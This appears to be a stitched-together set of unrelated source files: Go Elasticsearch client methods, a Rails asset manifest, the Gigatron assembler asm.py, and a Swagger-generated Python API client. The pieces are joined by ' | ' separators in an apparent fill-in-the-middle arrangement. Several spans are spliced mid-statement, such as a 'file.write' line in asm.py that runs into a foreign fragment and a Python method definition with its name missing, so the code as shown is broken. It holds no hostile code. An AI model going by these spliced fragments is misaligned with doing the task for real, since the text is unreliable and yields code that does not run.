// XPackSecurityGetUser gets details about one or more users.
func (c *Client) XPackSecurityGetUser(usernames ...string) *XPackSecurityGetUserService {
return NewXPackSecurityGetUserService(c).Usernames(usernames...)
}
// XPackSecurityPutUser adds or updates a user.
func (c *Client) XPackSecurityPutUser(username string) *XPackSecurityPutUserService {
return NewXPackSecurityPutUserService(c).Username(username)
}
// XPackSecurityEnableUser enables a user.
func (c *Client) XPackSecurityEnableUser(username string) *XPackSecurityEnableUserService {
return NewXPackSecurityEnableUserService(c).Username(username)
}
// XPackSecurityDisableUser disables a user.
func (c *Client) XPackSecurityDisableUser(username string) *XPackSecurityDisableUserService {
return NewXPackSecurityDisableUserService(c).Username(username)
}
// XPackSecurityDeleteUser deletes a user.
func (c *Client) XPackSecurityDeleteUser(username string) *XPackSecurityDeleteUserService {
return NewXPackSecurityDeleteUserService(c).Username(username)
}
// -- X-Pack Watcher --
// XPackWatchPut adds a watch.
func (c *Client) XPackWatchPut(watchId string) *XPackWatcherPutWatchService {
return NewXPackWatcherPutWatchService(c).Id(watchId)
}
// XPackWatchGet gets a watch.
func (c *Client) XPackWatchGet(watchId string) *XPackWatcherGetWatchService {
return NewXPackWatcherGetWatchService(c).Id(watchId)
}
// XPackWatchDelete deletes a watch.
func (c *Client) XPackWatchDelete(watchId string) *XPackWatcherDeleteWatchService {
return NewXPackWatcherDeleteWatchService(c).Id(watchId)
}
// XPackWatchExecute executes a watch.
func (c *Client) XPackWatchExecute() *XPackWatcherExecuteWatchService {
return NewXPackWatcherExecuteWatchService(c)
}
// XPackWatchAck acknowledges a watch.
func (c *Client) XPackWatchAck(watchId string) *XPackWatcherAckWatchService {
return NewXPackWatcherAckWatchService(c).WatchId(watchId)
}
// XPackWatchActivate activates a watch.
func (c *Client) XPackWatchActivate(watchId string) *XPackWatcherActivateWatchService {
return NewXPackWatcherActivateWatchService(c).WatchId(watchId)
}
// XPackWatchDeactivate deactivates a watch.
func (c *Client) XPackWatchDeactivate(watchId string) *XPackWatcherDeactivateWatchService {
return NewXPackWatcherDeactivateWatchService(c).WatchId(watchId)
}
// XPackWatchStats returns the current Watcher metrics.
func (c *Client) XPackWatchStats() *XPackWatcherStatsService {
return NewXPackWatcherStatsService(c)
}
// XPackWatchStart starts a watch.
func (c *Client) XPackWatchStart() *XPackWatcherStartService {
return NewXPackWatcherStartService(c)
}
// XPackWatchStop stops a watch.
func (c *Client) XPackWatchStop() *XPackWatcherStopService {
return NewXPackWatcherStopService(c)
}
// -- Helpers and shortcuts --
// ElasticsearchVersion returns the version number of Elasticsearch
// running on the given URL.
func (c *Client) ElasticsearchVersion(url string) (string, error) {
res, _, err := c.Ping(url).Do(context.Background())
if err != nil {
return "", err
}
return res.Version.Number, nil
}
// IndexNames returns the names of all indices in the cluster.
func (c *Client) IndexNames() ([]string, error) {
res, err := c.IndexGetSettings().Index("_all").Do(context.Background())
if err != nil {
return nil, err
}
var names []string
for name := range res {
names = append(names, name)
}
return names, nil
}
// Ping checks if a given node in a cluster exists and (optionally)
// returns some basic information about the Elasticsearch server,
// e.g. the Elasticsearch version number.
//
// Notice that you need to specify a URL here explicitly.
func (c *Client) Ping(url string) *PingService {
return NewPingService(c).URL(url)
}
// WaitForStatus waits for the cluster to have the given status.
// This is a shortcut method for the ClusterHealth service.
//
// WaitForStatus waits up to the specified timeout, e.g. "10s".
// If the cluster reaches the given status within the timeout, nil is returned.
// If the request times out, ErrTimeout is returned.
func (c *Client) WaitForStatus(status string, timeout string) error {
health, err := c.ClusterHealth().WaitForStatus(status).Timeout(timeout).Do(context.Background())
if err != nil {
return err
}
if health.TimedOut {
return ErrTimeout
}
return nil
}
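// exampleWaitForStatusUsage is an illustrative sketch (not part of the
// upstream API), typically useful in tests or startup code: block until the
// cluster reports at least the given status or the timeout expires.
func exampleWaitForStatusUsage(client *Client) error {
    if err := client.WaitForStatus("yellow", "10s"); err != nil {
        return err // either a transport error or ErrTimeout
    }
    return nil
}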
// WaitForGreenStatus waits for the cluster to have the "green" status.
// See WaitForStatus for more details.
func (c *Client) WaitForGreenStatus(timeout string) error {
return c.WaitForStatus("green", timeout)
}
// WaitForYellowStatus waits for the cluster to have the "yellow" status.
// See WaitForStatus for more details.
func (c *Client) WaitForYellowStatus(timeout string) error {
return c.WaitForStatus("yellow", timeout)
}
| {
return func(c *Client) error {
c.basicAuthUsername = username
c.basicAuthPassword = password
c.basicAuth = c.basicAuthUsername != "" || c.basicAuthPassword != ""
return nil
}
} |
application-turbolinks.js | // This is a manifest file that'll be compiled to include all the files listed below.
// Add new JavaScript/Coffee code in separate files in this directory and they'll automatically
// be included in the compiled file accessible from http://example.com/assets/application.js
// It's not advisable to add code directly here, but if you do, it'll appear at the bottom of
// the compiled file. | //= require jquery_ujs
//= require 'turbolinks'
//= require dummy/dummy.js
//= require init.js | //
//= require jquery |
asm.py | # SYNOPSIS: from asm import *
from os.path import basename, splitext
from sys import argv
# Module variables because I don't feel like making a class
_romSize, _maxRomSize, _zpSize = 0, 0, 1
_symbols, _refsL, _refsH = {}, [], []
_labels = {} # Inverse of _symbols, but only when made with label(). For disassembler
_comments = {}
_rom0, _rom1 = [], []
# Bus access
busD = 0
busRAM = 1
busAC = 2
busIN = 3
# Addressing modes
#
# How addresses into RAM are composed.
# In a sufficiently large RAM system there must be both immediate
# (absolute) addresses and computed addresses.
#
# A reasonable EAU could comprise a 16-bit data pointer, DP, to which
# an immediate 8-bit offset is optionally added, with the option to disable
# the DP (so we have zero page addressing). Such a unit requires 4 TTL
# adders + 6 TTL AND chips = 10 TTL chips.
#
# Our EA unit is a "poor man's" EAU that supports some workable combinations.
# There is no addition, so no linear address space, just selecting which
# parts go into which half. It uses 4 TTL chips. The data pointer DP is
# replaced with 8-bit X and 8-bit Y.
#
# Register and addressing modes are compacted to 8 combinations
#
ea0DregAC = 0 << 2
ea0XregAC = 1 << 2
eaYDregAC = 2 << 2
eaYXregAC = 3 << 2
ea0DregX = 4 << 2
ea0DregY = 5 << 2
ea0DregOUT = 6 << 2
eaYXregOUTIX = 7 << 2 # post-increment of X
# Store instructions
def ea0D(v): return ea0DregAC | d(v)
ea0X = ea0XregAC
def eaYD(v): return eaYDregAC | d(v)
eaYX = eaYXregAC
eaYXinc = eaYXregOUTIX
# Load/exec instructions (without memory)
regAC = ea0DregAC
regX = ea0DregX
regY = ea0DregY
regOUT = ea0DregOUT
# Immediate value
#
# Immediate means that the value used is encoded within the program stream,
# instead of, for example, coming from a register or memory location.
#
def val(v): return busD | d(v)
def d(v): return ((v & 255) << 8)
def ram(ea): return busRAM | ea
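# Worked example (for illustration; ld() and ldzp() are defined further below):
#   val(3)          == busD | d(3)                  == 0x0300, so ld(val(3)) emits
#                      opcode 0x00 / operand 0x03, i.e. "ld $03" (AC := 3).
#   ram(ea0D(0x30)) == busRAM | ea0DregAC | d(0x30) == 0x3001, so ld(ram(ea0D(0x30)))
#                      emits opcode 0x01 / operand 0x30, i.e. "ld [$30]" (AC := RAM[$30]).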
# General instruction layout
_maskOp = 0b11100000
_maskMode = 0b00011100
_maskCc = 0b00011100
_maskBus = 0b00000011
# Operations
_opLD = 0 << 5
_opAND = 1 << 5
_opOR = 2 << 5
_opXOR = 3 << 5
_opADD = 4 << 5
_opSUB = 5 << 5
_opST = 6 << 5
_opJ = 7 << 5
# No operation
_nops = [_opLD | regAC | busAC,
_opAND | regAC | busAC,
_opOR | regAC | busAC ]
_clrs = [_opXOR | regAC | busAC,
_opSUB | regAC | busAC ]
# Jump conditions
#
# During jump, the ALU is wired to calculate "-AC".
# Only the overflow flag is looked at. The negation result itself is discarded, not used.
# Only when all bits of AC are zero does -AC overflow the ALU, so the overflow acts as a zero flag (Z).
# If we look at bit 7 of AC, we know if AC is negative or positive.
# What does the combination of two signals tell us:
#
# Z bit7
# 0 0 | AC>0 | 0 1 0 1 0 1 0 1 Instruction bit 2
# 0 1 | AC<0 | 0 0 1 1 0 0 1 1 Instruction bit 3
# 1 0 | AC=0 | 0 0 0 0 1 1 1 1 Instruction bit 4
# 1 1 | n/a -------------------------
# F GT LT NE EQ GE LE T Condition code ("F" is repurposed for long jumps)
jL = 0 << 2
jGT = 1 << 2
jLT = 2 << 2
jNE = 3 << 2
jEQ = 4 << 2
jGE = 5 << 2
jLE = 6 << 2
jS = 7 << 2
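# Example (illustrative): a conditional branch combines the jump operation, a
# condition code and a bus mode. For instance beq() with an immediate target is
#   _opJ | jEQ | busD  ==  0b11100000 | 0b00010000 | 0b00000000  ==  0xf0
# so "beq $12" assembles to opcode 0xf0 with operand 0x12. jL selects the
# unconditional far jump "jmp y,..." instead.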
_mnemonics = [ 'ld', 'anda', 'ora', 'xora', 'adda', 'suba', 'st', 'j' ]
def _hexString(val):
return '$%02x' % val
def label(name):
address = _romSize
define(name, address)
if address not in _labels:
_labels[address] = [] # There can be more than one
_labels[_romSize].append(name)
def C(line):
"""Insert comment to print in disassembly"""
if line:
address = max(0, _romSize-1)
if address not in _comments:
_comments[address] = []
_comments[address].append(line)
return None
def define(name, value):
global _symbols
_symbols[name] = value
def symbol(name):
return _symbols[name] if name in _symbols else None
def lo(name):
global _refsL
_refsL.append((name, _romSize))
return 0 # placeholder
def hi(name):
global _refsH
_refsH.append((name, _romSize))
return 0 # placeholder
def disassemble(opcode, operand, address=None):
text = _mnemonics[opcode >> 5] # (74LS155)
isStore = (opcode & 0xe0) == _opST
# Decode addressing and register mode (74LS138)
if text != 'j':
if opcode & _maskMode == ea0DregAC: ea, reg = '[%s]' % _hexString(operand), 'ac'
if opcode & _maskMode == ea0XregAC: ea, reg = '[x]', 'ac'
if opcode & _maskMode == eaYDregAC: ea, reg = '[y,%s]' % _hexString(operand), 'ac'
if opcode & _maskMode == eaYXregAC: ea, reg = '[y,x]', 'ac'
if opcode & _maskMode == ea0DregX: ea, reg = '[%s]' % _hexString(operand), 'x'
if opcode & _maskMode == ea0DregY: ea, reg = '[%s]' % _hexString(operand), 'y'
if opcode & _maskMode == ea0DregOUT: ea, reg = '[%s]' % _hexString(operand), 'out'
if opcode & _maskMode == eaYXregOUTIX: ea, reg = '[y,x++]', 'out'
else:
ea = '[%s]' % _hexString(operand)
# Decode bus mode (74LS139)
if opcode & _maskBus == busD: bus = _hexString(operand)
if opcode & _maskBus == busRAM: bus = '$??' if isStore else ea
if opcode & _maskBus == busAC: bus = 'ac'
if opcode & _maskBus == busIN: bus = 'in'
if text == 'j':
# Decode jumping mode (74LS153)
if opcode & _maskCc == jL: text = 'jmp y,'
if opcode & _maskCc == jS: text = 'bra '
if opcode & _maskCc == jEQ: text = 'beq '
if opcode & _maskCc == jNE: text = 'bne '
if opcode & _maskCc == jGT: text = 'bgt '
if opcode & _maskCc == jGE: text = 'bge '
if opcode & _maskCc == jLT: text = 'blt '
if opcode & _maskCc == jLE: text = 'ble '
if address is not None and opcode & _maskCc != jL and opcode & _maskBus == busD:
# We can calculate the destination address
# XXX Except when the previous instruction is a far jump (jmp y,...)
lo, hi = address&255, address>>8
if lo == 255: # When branching from $xxFF, we still end up in the next page
hi = (hi + 1) & 255
destination = (hi << 8) + operand
if destination in _labels:
bus = _labels[destination][-1]
else:
bus = '$%04x' % destination
text += bus
else:
# Compose string
if isStore:
if bus == 'ac':
text = '%-4s %s' % (text, ea)
else:
text = '%-4s %s,%s' % (text, bus, ea)
if reg != 'ac' and reg != 'out': # X and Y are not muted
text += ',' + reg
else:
if reg == 'ac':
text = '%-4s %s' % (text, bus)
else:
text = '%-4s %s,%s' % (text, bus, reg)
# Specials
if opcode in _nops: text = 'nop'
if opcode in _clrs: text = 'clr'
# Emit as text
return text
def _emit(ins):
global _rom0, _rom1, _romSize, _maxRomSize
opcode, operand = ins & 255, ins >> 8
if _romSize >= _maxRomSize:
disassembly = disassemble(opcode, operand)
print '%04x %02x%02x %s' % (_romSize, opcode, operand, disassembly)
print 'Error: Program size limit exceeded'
_maxRomSize = 0x10000 # Extend to full address space to prevent more of the same errors
_rom0.append(opcode)
_rom1.append(operand)
_romSize += 1
# Warning for conditional branches with a target address from RAM. The (unverified) danger is
# that the ALU is calculating `-A' (for the condition decoder) as L+R+1, with L=0 and R=~A. But B
# is also an input to R and comes from memory. The addressing mode is [D], which requires high
# EH and EL, and this is slower when the diodes are forward biased from the previous instruction.
# Therefore R might momentarily glitch while B changes value and the AND/OR layers in the 74153
# multiplexer resettle. Such a glitch then potentially ripples all the way through two 74283
# adders and the control unit's 74153. This all depends on the previous instruction's addressing
# mode and the values of AC and [D], which we can't know with static analysis.
if opcode & _maskOp == _opJ and\
opcode & _maskBus == busRAM and\
opcode & _maskCc in [ jGT, jLT, jNE, jEQ, jGE, jLE ]:
disassembly = disassemble(opcode, operand)
print '%04x %02x%02x %s' % (_romSize, opcode, operand, disassembly)
print 'Warning: large propagation delay (conditional branch with RAM on bus)'
def ld (base, reg=regAC, flags=0): _emit(_opLD | base | reg | flags)
def anda(base, reg=regAC, flags=0): _emit(_opAND | base | reg | flags)
def ora (base, reg=regAC, flags=0): _emit(_opOR | base | reg | flags)
def xora(base, reg=regAC, flags=0): _emit(_opXOR | base | reg | flags)
def adda(base, reg=regAC, flags=0): _emit(_opADD | base | reg | flags)
def suba(base, reg=regAC, flags=0): _emit(_opSUB | base | reg | flags)
def jmpy(base): _emit(_opJ | jL | base)
def bra (base): _emit(_opJ | jS | base)
def beq (base): _emit(_opJ | jEQ | base)
def bne (base): _emit(_opJ | jNE | base)
def bgt (base): _emit(_opJ | jGT | base)
def blt (base): _emit(_opJ | jLT | base)
def bge (base): _emit(_opJ | jGE | base)
def ble (base): _emit(_opJ | jLE | base)
bpl = bge # Alias
bmi = blt # Alias
def nop (): _emit(_nops[0])
def clr (): _emit(_clrs[0])
def st (base1, base2=busAC): _emit(_opST | base1 | base2)
def out (base=busAC): _emit(_opLD | base | regOUT)
def ldzp (base): _emit(_opLD | busRAM | ea0DregAC | base)
def ldzpx(base): _emit(_opLD | busRAM | ea0DregX | base)
def ldzpy(base): _emit(_opLD | busRAM | ea0DregY | base)
def align(n, chunkSize=0x10000):
global _romSize, _maxRomSize
_maxRomSize = 0x10000
while _romSize % n > 0:
nop()
_maxRomSize = min(_maxRomSize, _romSize + chunkSize)
def wait(n):
comment = 'Wait %s cycle%s' % (n, '' if n==1 else 's')
assert n >= 0
if n > 4:
n -= 1
ld(val(n/2 - 1))
comment = C(comment)
bne(d(_romSize & 255))
suba(val(1))
n = n % 2
while n > 0:
nop()
n -= 1
def pc():
return _romSize
def zpByte(len=1):
global _zpSize
s = _zpSize
if s <= 0x80 and 0x80 < s + len:
s = 0x81 # Keep 0x80 reserved
_zpSize = s+len
assert _zpSize <= 0x100
return s
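# Example (illustrative): with a fresh module state the first zpByte() call returns
# zero-page address 1, a following zpByte(2) returns 2, and so on. A request that
# would straddle address 0x80 is moved up to 0x81, keeping location 0x80 reserved.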
def zpReset(startFrom=1):
global _zpSize
_zpSize = startFrom
def trampoline():
"""Read 1 byte from ROM page"""
while pc()&255 < 256-5:
nop()
bra(busAC); #13
"""
It is possible to make this section 2 bytes shorter
and 1 cycle faster by entering directly with "jmp y,ac"
instead of "jmp y,251". However, this will cost two
words at 'LUP' in vCPU and space is expensive there.
"""
C('+-----------------------------------+')
bra(val(253)) #14
C('| |')
ld(d(hi('lupReturn')),regY) #15
C('| Trampoline for page $%04x lookups |' % (pc()&~255))
jmpy(d(lo('lupReturn'))) #17
C('| |')
st(d(lo('vAC'))) #18
C('+-----------------------------------+')
def end():
errors = 0
global _rom0, _rom1, _romSize
global _refsL
for name, where in _refsL:
if name in _symbols:
_rom1[where] ^= _symbols[name] & 255 # xor allows some label tricks
else:
print 'Error: Undefined symbol %s' % repr(name)
errors += 1
global _refsH
for name, where in _refsH:
if name in _symbols:
_rom1[where] += _symbols[name] >> 8
else:
print 'Error: Undefined symbol %s' % repr(name)
errors += 1
if errors:
print '%d error(s)' % errors
exit()
# Determine stem for file names
stem, ext = splitext(argv[0])
stem = basename(stem)
if stem == '': stem = 'out'
# Disassemble for readability
filename = stem + '.asm'
print 'Create file', filename
with open(filename, 'w') as file:
file.write(' address\n'
' | encoding\n'
' | | instruction\n'
' | | | operands\n'
' | | | |\n'
' V V V V\n')
address = 0
repeats, previous, postponed = 0, None, None
maxRepeat = 3
for instruction in zip(_rom0, _rom1):
# Check if there is a label defined for this address
label = _labels[address][-1] + ':' if address in _labels else ''
comment = _comments[address][0] if address in _comments else ''
if instruction != previous or label or comment:
repeats, previous = 0, instruction
if postponed:
file.write(postponed)
postponed = None
if label:
for extra in _labels[address][:-1]:
file.write(extra+':\n') # Extra labels get their own line
if len(label) > 13:
label += '\n' + (13 * ' ')
else:
repeats += 1
if repeats <= maxRepeat:
opcode, operand = instruction
disassembly = disassemble(opcode, operand, address)
if comment:
line = '%-13s %04x %02x%02x %-16s ;%s\n' % (label, address, opcode, operand, disassembly, comment)
else:
line = '%-13s %04x %02x%02x %s\n' % (label, address, opcode, operand, disassembly)
if repeats < maxRepeat:
file.write(line) # always write first N | file.write(42*' ' + ';%s\n' % extra)
if repeats == maxRepeat:
postponed = line # if this turns out to be the last repeat, emit the line
if repeats > maxRepeat: # now it makes sense to abbreviate the output
postponed = 14*' '+'* %d times\n' % (1+repeats)
address += 1
if postponed:
file.write(postponed)
file.write(14*' '+'%04x\n' % address)
assert(len(_rom0) == _romSize)
assert(len(_rom1) == _romSize)
# Write ROM files
filename = stem + '.0.rom'
print 'Create file', filename
with open(filename, 'wb') as file:
file.write(''.join([chr(byte) for byte in _rom0]))
filename = stem + '.1.rom'
print 'Create file', filename
with open(filename, 'wb') as file:
file.write(''.join([chr(byte) for byte in _rom1]))
# 16-bit version for 27C1024, little endian
filename = stem + '.2.rom'
print 'Create file', filename
_rom2 = []
for x, y in zip(_rom0, _rom1):
_rom2.append(x)
_rom2.append(y)
# Padding
while len(_rom2) < 2*_maxRomSize:
_rom2.append(ord('Gigatron!'[ (len(_rom2)-2*_maxRomSize) % 9 ]))
# Write ROM file
with open(filename, 'wb') as file:
file.write(''.join([chr(byte) for byte in _rom2]))
print 'OK used %d free %d size %d' % (_romSize, _maxRomSize-_romSize, len(_rom2)) | if comment:
for extra in _comments[address][1:]: |
location_frontend_api.py | # coding: utf-8
"""
NEF_Emulator
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 0.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from evolved5g.swagger_client.api_client import ApiClient
class LocationFrontendApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_path_api_v1_frontend_location_post(self, body, **kwargs): # noqa: E501
"""Create Path # noqa: E501
Create new path. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_path_api_v1_frontend_location_post(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PathCreate body: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_path_api_v1_frontend_location_post_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_path_api_v1_frontend_location_post_with_http_info(body, **kwargs) # noqa: E501
return data
def create_path_api_v1_frontend_location_post_with_http_info(self, body, **kwargs): # noqa: E501
"""Create Path # noqa: E501
Create new path. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_path_api_v1_frontend_location_post_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PathCreate body: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_path_api_v1_frontend_location_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_path_api_v1_frontend_location_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/frontend/location/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Path', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_path_api_v1_frontend_location_id_delete(self, id, **kwargs): # noqa: E501
"""Delete Path # noqa: E501
Delete a path. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_path_api_v1_frontend_location_id_delete(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_path_api_v1_frontend_location_id_delete_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_path_api_v1_frontend_location_id_delete_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_path_api_v1_frontend_location_id_delete_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete Path # noqa: E501
Delete a path. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_path_api_v1_frontend_location_id_delete_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_path_api_v1_frontend_location_id_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_path_api_v1_frontend_location_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/frontend/location/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Path', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_path_api_v1_frontend_location_id_get(self, id, **kwargs): # noqa: E501
"""Read Path # noqa: E501
Get path by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_path_api_v1_frontend_location_id_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_path_api_v1_frontend_location_id_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.read_path_api_v1_frontend_location_id_get_with_http_info(id, **kwargs) # noqa: E501
return data
def read_path_api_v1_frontend_location_id_get_with_http_info(self, id, **kwargs): # noqa: E501
"""Read Path # noqa: E501
Get path by ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_path_api_v1_frontend_location_id_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_path_api_v1_frontend_location_id_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `read_path_api_v1_frontend_location_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/frontend/location/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Path', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_paths_api_v1_frontend_location_get(self, **kwargs): # noqa: E501
"""Read Paths # noqa: E501
Retrieve paths. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_paths_api_v1_frontend_location_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int skip:
:param int limit:
:return: list[Path]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_paths_api_v1_frontend_location_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.read_paths_api_v1_frontend_location_get_with_http_info(**kwargs) # noqa: E501
return data
def read_paths_api_v1_frontend_location_get_with_http_info(self, **kwargs): # noqa: E501
"""Read Paths # noqa: E501
Retrieve paths. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_paths_api_v1_frontend_location_get_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int skip:
:param int limit:
:return: list[Path]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['skip', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_paths_api_v1_frontend_location_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'skip' in params:
query_params.append(('skip', params['skip'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/frontend/location/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Path]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_path_api_v1_frontend_location_id_put(self, body, id, **kwargs): # noqa: E501
"""Update Path # noqa: E501
Update a path. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_path_api_v1_frontend_location_id_put(body, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PathUpdate body: (required)
:param int id: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_path_api_v1_frontend_location_id_put_with_http_info(body, id, **kwargs) # noqa: E501
else:
(data) = self.update_path_api_v1_frontend_location_id_put_with_http_info(body, id, **kwargs) # noqa: E501
return data
def | (self, body, id, **kwargs): # noqa: E501
"""Update Path # noqa: E501
Update a path. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_path_api_v1_frontend_location_id_put_with_http_info(body, id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PathUpdate body: (required)
:param int id: (required)
:return: Path
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_path_api_v1_frontend_location_id_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_path_api_v1_frontend_location_id_put`") # noqa: E501
# verify the required parameter 'id' is set
if ('id' not in params or
